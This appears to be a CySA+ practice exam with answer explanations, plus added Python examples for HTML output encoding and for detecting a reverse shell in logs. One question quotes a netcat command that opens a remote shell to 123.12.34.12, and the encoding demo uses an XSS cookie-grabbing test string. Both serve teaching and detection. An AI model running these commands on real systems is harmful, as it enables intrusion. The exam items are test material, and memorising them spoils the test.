CompTIA CySA+ (CS0-003) Practice Exam #3 Questions and Answers.
In the aftermath of a ransomware attack at your company, you, as the incident response
manager, have been asked to present a report to the executive team. They are
particularly interested in a detailed analysis of how the attack happened and the key
areas that allowed it to occur. What part of your report should you focus on?
Executive summary
Scope
Recommendations
Root cause analysis - Correct Answer Root cause analysis
A root cause analysis provides a deep dive into what allowed the incident to occur,
helping to identify vulnerabilities and procedural shortcomings. The scope section
typically outlines what systems and data were impacted by the incident, not the reasons
behind it. While the recommendations section provides guidance on future action, it does
not typically contain a detailed analysis of how the incident occurred. While the executive
summary provides a high-level overview of the incident, it does not typically delve into a
detailed analysis of the root causes.
What sanitization technique uses only logical techniques to remove data, such as
overwriting a hard drive with a random series of ones and zeroes?
Clear - Correct Answer Clear
Clear applies logical techniques to sanitize data in all user-addressable storage locations
for protection against simple, non-invasive data recovery techniques. Clearing involves
overwriting data once (and seldom more than three times) with non-sensitive data (such as
all zeros or a random pattern) or resetting a device to factory settings. Purging is meant to
make the information infeasible to recover even with state-of-the-art laboratory
techniques. Destroy requires physical destruction of the media, such as pulverization,
melting, incineration, and disintegration. Degaussing, which decreases or eliminates the
remnant magnetic field, is an effective purge technique for magnetic media such as hard
drives and floppy disks, but it has no effect on solid-state (flash) storage.
In a network vulnerability assessment report, several zero-day and critical vulnerabilities
were discovered. Why might this necessitate immediate action?
Because they signal a need to decrease the frequency of vulnerability assessments
These vulnerabilities present significant risk due to no current security fix being available
Because they indicate a need to hire more staff
Because zero-day and critical vulnerabilities improve the system's performance - Correct
Answer These vulnerabilities present significant risk due to no current security fix being
available
Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a
system's security; a zero-day in particular has no vendor patch yet, so compensating
controls are the only defense until one ships. A well-known example of the damage an
unpatched critical vulnerability can do is the "WannaCry" ransomware worm of May 2017.
It exploited a flaw in the Windows SMBv1 service (MS17-010) to spread rapidly across
networks, encrypting files and demanding ransom payments in exchange for decryption;
Microsoft had released the patch about two months earlier, but large numbers of
unpatched hosts were still compromised. These types of vulnerabilities are significant
threats, not performance enhancers. While additional resources might be needed for
vulnerability management, the presence of critical vulnerabilities does not directly
indicate staffing needs. On the contrary, critical vulnerabilities might suggest a need for
more frequent and thorough assessments.
You are a security investigator at a high-security installation which houses significant
amounts of valuable intellectual property. You are investigating the utilization of George's
credentials and are trying to determine if his credentials were compromised or if he is an
insider threat. In the break room, you overhear George telling a coworker that he believes
he is the target of an ongoing investigation. Which of the following steps in the preparation
phase of the incident response process was likely missed?
Creating a call list or escalation list
Conduct background screenings on all applicants
Developing a proper incident response form
Development of a communication plan - Correct Answer Development of a
communication plan
An established and agreed-upon communication plan, which may also include a non-
disclosure agreement, should be put in place to prevent the target of an ongoing insider
threat investigation from becoming aware of it. Even if it was later determined that
George was innocent, the knowledge that he was being investigated could be damaging
to both him and the company. If he was an insider threat who now suspects he is under
investigation, he could take steps to cover his tracks or conduct destructive action. While
background screenings may prevent some people from becoming insiders, it would not
prevent the unauthorized disclosure of information concerning the investigation. A call
list/escalation list will help manage this kind of problem and keep the right people
informed, but it will not explicitly deal with the issue of inadvertent disclosure. Similarly, a
proper incident response form may include guidance for communication but would have
been orchestrated as part of a larger communications plan that detailed the proper
channels to use.
Which of the following secure coding best practices ensures a character like < is
translated into the &lt; string when writing to an HTML page?
Output encoding - Correct Answer Output encoding
Output encoding involves translating special characters into some different but
equivalent form that is no longer dangerous in the target interpreter, for example,
translating the < character into the &lt; string when writing to an HTML page. The
encoding must match the context the data lands in (HTML body, HTML attribute,
JavaScript, URL), since each interpreter has its own set of special characters. Input
validation is performed to ensure only properly formed data is entering the workflow in an
information system, preventing malformed data from persisting in the database and
triggering the malfunction of various downstream components; it complements output
encoding but does not replace it, because some fields must legitimately accept < or &.
Improper error handling can introduce various security problems where detailed internal
error messages such as stack traces, database dumps, and error codes are displayed to
an attacker. The session management implementation defines the exchange mechanism
that will be used between the user and the web application to share and continuously
exchange the session ID.
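As an added example (not code from the original page), here is a Python version of the two controls the explanation contrasts, run on a constructed attacker-supplied display name and on a legitimate search string that validation cannot reject. The names html_encode, is_valid_display_name, render_greeting, render_search_echo and matches_stdlib are illustrative; the cross-check against the standard library's html.escape shows the hand-written encoder produces the same entities.

```python
import html

# Added example, not from the original page. Function names are illustrative.
# HTML body context: the characters an HTML interpreter treats specially.
HTML_ENTITIES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def html_encode(value: str) -> str:
    """Output encoding: translate each special character into an equivalent
    entity so the browser renders it as text instead of interpreting it."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in value)


def is_valid_display_name(name: str) -> bool:
    """Input validation: accept only well-formed display names (letters,
    spaces, apostrophes, hyphens). This stops malformed data at the edge but
    cannot protect fields that legitimately contain < or &."""
    return 1 <= len(name) <= 40 and all(ch.isalpha() or ch in " '-" for ch in name)


def render_greeting(display_name: str, encode_output: bool = True) -> str:
    """Build the HTML fragment the page sends to the browser. With
    encode_output=False the fragment is vulnerable to cross-site scripting."""
    shown = html_encode(display_name) if encode_output else display_name
    return f"<p>Welcome back, <b>{shown}</b></p>"


def render_search_echo(query: str) -> str:
    """A search page must accept '<' in the query, so validation cannot reject
    it; output encoding is what keeps the echoed query harmless."""
    return f'<p>Results for "{html_encode(query)}"</p>'


def matches_stdlib(value: str) -> bool:
    """Cross-check the hand-written encoder against html.escape, which
    encodes the same five characters (quote=True is its default)."""
    return html_encode(value) == html.escape(value)


if __name__ == "__main__":
    # Constructed inputs: one attacker payload, one legitimate name, one query.
    payload = "<script>alert(document.cookie)</script>"
    print(render_greeting(payload, encode_output=False))  # script tag reaches the browser
    print(render_greeting(payload))                       # rendered as literal text
    print(is_valid_display_name("O'Neil"), is_valid_display_name(payload))
    print(render_search_echo('1 < 2 && "x"'))
```

The encoder above is for the HTML body and attribute context only; data written into a JavaScript block or a URL needs that context's own encoder.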
You have just begun an investigation by reviewing the security logs. During the log
review, you notice the following lines of code:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
sc config schedule start auto
net start schedule
at 10:42 ""c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe ""
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What BEST describes what is occurring and what action do you recommend to stop it?
The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto
cron job remotely; No recommendation is required since this is not malicious activity
The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp
directory to create a remote connection to 123.12.34.12; you should recommend
removing the host from the network
The host (123.12.34.12) is a rogue device on the network; you should recommend
removing the host from the network
The host is beaconing to 123.12.34 - Correct Answer The host is using the Windows Task
Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to
123.12.34.12; you should recommend removing the host from the network
The three commands set the Task Scheduler service (schedule) to start automatically, start
it, and use the at command to run nc.exe (netcat) at 10:42 with -e cmd.exe, which hands a
command shell to whatever is listening on 123.12.34.12 port 443. That is a reverse shell
launched from a scratch directory, not a routine job, so the host should be isolated from
the network and investigated. Note that 123.12.34.12 is the remote end of the connection,
not the host that ran the commands, and at is a Windows scheduler, not a cron job.
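As an added example (not from the original page), the following Python detector parses the three command-log lines above, reproduced here as constructed sample input, and turns them into findings plus an isolation verdict. The regular expressions, the Finding class and the analyze/verdict functions are illustrative names; the same idea carries over to the schtasks command that replaced at on current Windows versions.

```python
import re
from dataclasses import dataclass

# Added example, not from the original page. The log lines are constructed
# from the three commands shown in the question.
SAMPLE_LOG_LINES = [
    r'sc config schedule start auto',
    r'net start schedule',
    r'at 10:42 ""c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe ""',
]


@dataclass
class Finding:
    line: str
    technique: str   # persistence | scheduled_task | reverse_shell
    detail: str


# "sc config <svc> start= auto" (the "=" is optional, as in the log shown)
SC_AUTO = re.compile(r'^sc\s+config\s+(?P<svc>\S+)\s+start\s*=?\s*auto$', re.IGNORECASE)
NET_START = re.compile(r'^net\s+start\s+(?P<svc>\S+)$', re.IGNORECASE)
# "at HH:MM "command"" with one or more quotes around the command
AT_JOB = re.compile(r'^at\s+(?P<time>\d{1,2}:\d{2})\s+"+(?P<cmd>.+?)\s*"+\s*$', re.IGNORECASE)
NETCAT = re.compile(r'(?:^|[\\/\s])(?:nc|ncat|netcat)(?:\.exe)?\b', re.IGNORECASE)
REMOTE = re.compile(r'\b(?P<ip>(?:\d{1,3}\.){3}\d{1,3})\s+(?P<port>\d{1,5})\b')
EXEC_FLAG = re.compile(r'(?:^|\s)-e\s+(?P<shell>\S+)', re.IGNORECASE)


def analyze(lines) -> list:
    """Walk the command log and emit a Finding for each suspicious step."""
    findings = []
    for raw in lines:
        line = raw.strip()
        m = SC_AUTO.match(line)
        if m and m.group("svc").lower() == "schedule":
            findings.append(Finding(line, "persistence",
                                    "Task Scheduler service set to start automatically"))
            continue
        m = NET_START.match(line)
        if m and m.group("svc").lower() == "schedule":
            findings.append(Finding(line, "persistence", "Task Scheduler service started"))
            continue
        m = AT_JOB.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        findings.append(Finding(line, "scheduled_task",
                                f"job at {m.group('time')} runs: {cmd}"))
        remote = REMOTE.search(cmd)
        execf = EXEC_FLAG.search(cmd)
        # netcat + remote address/port + "-e <shell>" is the reverse-shell signature
        if NETCAT.search(cmd) and remote and execf:
            findings.append(Finding(line, "reverse_shell",
                                    f"netcat spawns {execf.group('shell')} over a connection "
                                    f"to {remote.group('ip')}:{remote.group('port')}"))
    return findings


def verdict(findings) -> str:
    """Turn the findings into the recommendation an analyst would give."""
    techniques = {f.technique for f in findings}
    if "reverse_shell" in techniques:
        return "critical: scheduled reverse shell; isolate the host from the network"
    if "scheduled_task" in techniques and "persistence" in techniques:
        return "suspicious: scheduler enabled and job created; review the job command"
    return "informational"


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG_LINES)
    for f in found:
        print(f"[{f.technique}] {f.detail}")
    print(verdict(found))
```

The remote address is extracted from the job command, not from the host that logged it, which is the distinction the wrong answer choices blur.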
You are investigating a suspected compromise. You have noticed several files that you
don't recognize. How can you quickly and effectively check if the files have been infected
with malware?
Run the Strings tool against each file to identify common malware identifiers
Disassemble the files and conduct static analysis on them using IDA Pro
Submit the files to an open-source intelligence provider like VirusTotal
Scan the files using a local anti-virus/anti-malware engine - Correct Answer Submit the
files to an open-source intelligence provider like VirusTotal
The best option is to submit them to an open-source intelligence provider like VirusTotal.
VirusTotal allows you to quickly analyze suspicious files and URLs with dozens of
anti-malware engines, giving broader coverage than a single local engine, and it then
automatically shares the samples with the security community, as well. Look up each file's
hash before uploading: an uploaded sample becomes visible to other VirusTotal users,
which can expose sensitive internal data and tip off an attacker that their tool has been
found, and a hash match answers the question without the upload. Running strings or
disassembling the files in IDA Pro is static analysis that takes far longer and is not a
quick check.